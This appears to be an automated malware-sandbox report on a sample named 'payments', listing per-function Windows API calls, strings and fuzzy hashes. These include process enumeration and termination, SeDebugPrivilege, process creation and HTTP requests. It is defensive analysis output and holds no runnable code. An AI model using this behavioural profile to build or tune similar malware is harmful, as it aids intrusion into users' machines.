                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1241431887-3916222277
                                                                                                                          • Opcode ID: 2e3423d521db0ec7b3ad9d042a2aabf98c138ab3b6905ddaf74b803acf0a0531
                                                                                                                          • Instruction ID: 003f82e37d2383615fd8890439003cba55cb75c72c72800eec1226db0940b175
                                                                                                                          • Opcode Fuzzy Hash: 2e3423d521db0ec7b3ad9d042a2aabf98c138ab3b6905ddaf74b803acf0a0531
                                                                                                                          • Instruction Fuzzy Hash: B1419DB1501244BFEB169F51CC89FFB77ACFF09304F008016FA15DA181DBB49A459BA4
                                                                                                                          Function 00CF8FC8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00CF8FE7
                                                                                                                          • GetWindowLongW.USER32(00E8CF70,000000F0), ref: 00CF901A
                                                                                                                          • GetWindowLongW.USER32(00E8CF70,000000F0), ref: 00CF904F
                                                                                                                          • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00CF9081
                                                                                                                          • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00CF90AB
                                                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00CF90BC
                                                                                                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00CF90D6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LongWindow$MessageSend
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 2178440468-2594219639
                                                                                                                          • Opcode ID: a0e189bf82af2b142436c2be02fe70ba1cd1bccc42bfe18dc42c1da0001587c2
                                                                                                                          • Instruction ID: d414f2d533e63fa49921133c51a290ded59d274a58a5c07a0f48b70664975d59
                                                                                                                          • Opcode Fuzzy Hash: a0e189bf82af2b142436c2be02fe70ba1cd1bccc42bfe18dc42c1da0001587c2
                                                                                                                          • Instruction Fuzzy Hash: 7A312638600219EFDF608F58DC85FA437A5FB4A714F144164FA29CB2B2CF71A945DB62
                                                                                                                          Function 00CEB644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00D2DC00), ref: 00CEB715
                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00D2DC00), ref: 00CEB749
                                                                                                                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00CEB8C1
                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00CEB8EB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 560350794-0
                                                                                                                          • Opcode ID: 9fb9c184fa335ad03d0f594ed8116498b813555205e264928d7b4ae43237638c
                                                                                                                          • Instruction ID: 7a3e6e2a739bcf691ae337d032570338759119b4bae9909f5259b456852980cb
                                                                                                                          • Opcode Fuzzy Hash: 9fb9c184fa335ad03d0f594ed8116498b813555205e264928d7b4ae43237638c
                                                                                                                          • Instruction Fuzzy Hash: 2CF12871A00249AFCF14DF95C888EBEB7B9FF48315F108469F915AB250DB31AE45DB90
                                                                                                                          Function 00CF24D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _memset.LIBCMT ref: 00CF24F5
                                                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00CF2688
                                                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00CF26AC
                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00CF26EC
                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00CF270E
                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00CF286F
                                                                                                                          • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00CF28A1
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00CF28D0
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00CF2947
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4090791747-0
                                                                                                                          • Opcode ID: a65a040bdb0a62cd5d55dca37fa312d6287651f173c2c13dfca96abeb2bbf17c
                                                                                                                          • Instruction ID: cf1d1bc3955de98d989cd93cfe6a8c7225e71830e3c803a706ec8a713ebda4bc
                                                                                                                          • Opcode Fuzzy Hash: a65a040bdb0a62cd5d55dca37fa312d6287651f173c2c13dfca96abeb2bbf17c
                                                                                                                          • Instruction Fuzzy Hash: 4AD1BD31604301DFCB14EF24C891A6EBBE1BF89324F14856DF9999B2A2DB31ED41DB52
                                                                                                                          Function 00CD7555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CD6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00CD5FA6,?), ref: 00CD6ED8
                                                                                                                            • Part of subcall function 00CD6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00CD5FA6,?), ref: 00CD6EF1
                                                                                                                            • Part of subcall function 00CD72CB: GetFileAttributesW.KERNEL32(?,00CD6019), ref: 00CD72CC
                                                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 00CD75CA
                                                                                                                          • _wcscmp.LIBCMT ref: 00CD75E2
                                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 00CD75FB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 793581249-0
                                                                                                                          • Opcode ID: 716b8b0de95c8414ef16979d97e2acb15972d87796f860e564b597797938bce2
                                                                                                                          • Instruction ID: f1ec114d6db6b6ee45d654e1ddb6a86c1a1adfccf453a63520c9d2da32bb957d
                                                                                                                          • Opcode Fuzzy Hash: 716b8b0de95c8414ef16979d97e2acb15972d87796f860e564b597797938bce2
                                                                                                                          • Instruction Fuzzy Hash: 655111B2A092299ADF51EB94D8819DE73BC9F08310F1045ABFA05E3641FB74D7C9CB64
                                                                                                                          Function 00CAEA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00D0DAD1,00000004,00000000,00000000), ref: 00CAEAEB
                                                                                                                          • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00D0DAD1,00000004,00000000,00000000), ref: 00CAEB32
                                                                                                                          • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00D0DAD1,00000004,00000000,00000000), ref: 00D0DC86
                                                                                                                          • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00D0DAD1,00000004,00000000,00000000), ref: 00D0DCF2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ShowWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1268545403-0
                                                                                                                          • Opcode ID: d050dd0923b960ba269f08e4bc2d4304a95a1c174e9c85b7509613c415f4bef8
                                                                                                                          • Instruction ID: d1dc33e490a97b665bc47a3c223ec31cc25fb1305339f6334856090f6b009a6d
                                                                                                                          • Opcode Fuzzy Hash: d050dd0923b960ba269f08e4bc2d4304a95a1c174e9c85b7509613c415f4bef8
                                                                                                                          • Instruction Fuzzy Hash: E8412C70205382ABD7355729AD8DB7A7A97AB47308F19440EE05B826A1C770BC40D77D
                                                                                                                          Function 00CCB263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00CCAEF1,00000B00,?,?), ref: 00CCB26C
                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,00CCAEF1,00000B00,?,?), ref: 00CCB273
                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00CCAEF1,00000B00,?,?), ref: 00CCB288
                                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,00CCAEF1,00000B00,?,?), ref: 00CCB290
                                                                                                                          • DuplicateHandle.KERNEL32(00000000,?,00CCAEF1,00000B00,?,?), ref: 00CCB293
                                                                                                                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00CCAEF1,00000B00,?,?), ref: 00CCB2A3
                                                                                                                          • GetCurrentProcess.KERNEL32(00CCAEF1,00000000,?,00CCAEF1,00000B00,?,?), ref: 00CCB2AB
                                                                                                                          • DuplicateHandle.KERNEL32(00000000,?,00CCAEF1,00000B00,?,?), ref: 00CCB2AE
                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,00CCB2D4,00000000,00000000,00000000), ref: 00CCB2C8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1957940570-0
                                                                                                                          • Opcode ID: fea240ddbb3996132cb0bfb9a8c38ba0bf4c7a2dd8abc8a925c1b89ac31b1784
                                                                                                                          • Instruction ID: b0eee0aaaf7ba085224c23858dab35f4ffb2076b7137404857b1a1f640769581
                                                                                                                          • Opcode Fuzzy Hash: fea240ddbb3996132cb0bfb9a8c38ba0bf4c7a2dd8abc8a925c1b89ac31b1784
                                                                                                                          • Instruction Fuzzy Hash: F901BBB5240304BFE710ABA5DC49FAB7BADEB88711F018411FA15DB2A1CBB49801CB71
                                                                                                                          Function 00CEC43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                          • API String ID: 0-572801152
                                                                                                                          • Opcode ID: 6392392e148c3ce546513bf622ddb5934c486b9c4dec7b254fe8d364b611e4f7
                                                                                                                          • Instruction ID: ffe96a8509b9e4652aea1e259b6b932a75beba3a711f9da02b4e0068312196e5
                                                                                                                          • Opcode Fuzzy Hash: 6392392e148c3ce546513bf622ddb5934c486b9c4dec7b254fe8d364b611e4f7
                                                                                                                          • Instruction Fuzzy Hash: 6DE1D471A00259AFDF14DFAAC9C5BEE77B5EF48314F148029F915AB280D770AE42DB90
                                                                                                                          Function 00CEBB08 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 264COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Variant$ClearInit$_memset
                                                                                                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                          • API String ID: 2862541840-625585964
                                                                                                                          • Opcode ID: 9fb8ff8d956cffdb0dedadfdc851616795a5a2849ce4b19c4176d1dc848b0ecc
                                                                                                                          • Instruction ID: 9867bae5de6d285a3fcc2c03ae39899e8f075d5c54c063652a57a2cd77cce46c
                                                                                                                          • Opcode Fuzzy Hash: 9fb8ff8d956cffdb0dedadfdc851616795a5a2849ce4b19c4176d1dc848b0ecc
                                                                                                                          • Instruction Fuzzy Hash: 4F918B71A04259ABDB24CFA6CC44FAFBBB8EF45710F10815AF515AB284DB709E45CBA0
                                                                                                                          Function 00CD5347 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 180windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CAC6F4: _wcscpy.LIBCMT ref: 00CAC717
                                                                                                                          • _memset.LIBCMT ref: 00CD5438
                                                                                                                          • GetMenuItemInfoW.USER32(?), ref: 00CD5467
                                                                                                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00CD5513
                                                                                                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00CD553D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                          • String ID: (k$(k$0
                                                                                                                          • API String ID: 4152858687-3685605446
                                                                                                                          • Opcode ID: 32b6d06c9860f8c3a74794fb7c85ad55cab0a39ed4b9bd2028c41333b13d22a2
                                                                                                                          • Instruction ID: 2067dd3d4a50afb59c269eb5b96d550fe118ff353984a55d94ab178f6009ae53
                                                                                                                          • Opcode Fuzzy Hash: 32b6d06c9860f8c3a74794fb7c85ad55cab0a39ed4b9bd2028c41333b13d22a2
                                                                                                                          • Instruction Fuzzy Hash: 155123716047019BD7169F28D844BBBB7E9AF85350F04062FFAA5D33A0EB60CE44DB52
                                                                                                                          Function 00CF172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CD6532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00CD6554
                                                                                                                            • Part of subcall function 00CD6532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00CD6564
                                                                                                                            • Part of subcall function 00CD6532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00CD65F9
                                                                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CF179A
                                                                                                                          • GetLastError.KERNEL32 ref: 00CF17AD
                                                                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CF17D9
                                                                                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00CF1855
                                                                                                                          • GetLastError.KERNEL32(00000000), ref: 00CF1860
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00CF1895
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                          • String ID: SeDebugPrivilege
                                                                                                                          • API String ID: 2533919879-2896544425
                                                                                                                          • Opcode ID: e1b79112def4b2da64e1ee5678133945267cad826834b3ee902904849e458d71
                                                                                                                          • Instruction ID: 1eec269ccf66248edb1e8ede3492878ab157919eedec003b6863ce6f3a18e47b
                                                                                                                          • Opcode Fuzzy Hash: e1b79112def4b2da64e1ee5678133945267cad826834b3ee902904849e458d71
                                                                                                                          • Instruction Fuzzy Hash: 0541E071600205AFDB05EF98C995FBDB7A2AF04314F098059FA069F3D2DB799A01DB52
                                                                                                                          Function 00CFE397 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 108windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • ShowWindow.USER32(00D51628,00000000,00D51628,00000000,00000000,00D51628,?,00D0DC5D,00000000,?,00000000,00000000,00000000,?,00D0DAD1,00000004), ref: 00CFE40B
                                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 00CFE42F
                                                                                                                          • ShowWindow.USER32(00D51628,00000000), ref: 00CFE48F
                                                                                                                          • ShowWindow.USER32(00000000,00000004), ref: 00CFE4A1
                                                                                                                          • EnableWindow.USER32(00000000,00000001), ref: 00CFE4C5
                                                                                                                          • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00CFE4E8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Show$Enable$MessageSend
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 642888154-2594219639
                                                                                                                          • Opcode ID: 15b5c61ae4a2dab96105f99d883be42b2dbfb1cbbd50934710ce036e67f9f0c6
                                                                                                                          • Instruction ID: efbfc8a690e0cf393bbd9229313b3764637fa08bad5208ca4a74aa525456d2ac
                                                                                                                          • Opcode Fuzzy Hash: 15b5c61ae4a2dab96105f99d883be42b2dbfb1cbbd50934710ce036e67f9f0c6
                                                                                                                          • Instruction Fuzzy Hash: D6417431601158EFDB61CF68C499BA47FE1BF05304F1885A9EB698F2B2C731A942DB52
                                                                                                                          Function 00CD5819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • LoadIconW.USER32(00000000,00007F03), ref: 00CD58B8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: IconLoad
                                                                                                                          • String ID: blank$info$question$stop$warning
                                                                                                                          • API String ID: 2457776203-404129466
                                                                                                                          • Opcode ID: 8fcc0ae852b42ac20d15d2c48e248a1f8a4475d288606d2733f87987b10aa1e2
                                                                                                                          • Instruction ID: 7e2566aedca96ab2ec310e03d91207897438a2a413959af16d77765ff585c6b8
                                                                                                                          • Opcode Fuzzy Hash: 8fcc0ae852b42ac20d15d2c48e248a1f8a4475d288606d2733f87987b10aa1e2
                                                                                                                          • Instruction Fuzzy Hash: B511A535749746BEAB155B999C82DBA67AC9F15324F30403BF611E63C1EBA0AA00A264
                                                                                                                          Function 00CDA729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00CDA806
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ArraySafeVartype
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1725837607-0
                                                                                                                          • Opcode ID: ae166102cf28a538e56d390aa638ba51fc178f6e4ff45b1b892ca56e778f09b6
                                                                                                                          • Instruction ID: ca307e4468aa80828ea81a4a367f81226d4d2f99369280719f54e604f68af6e6
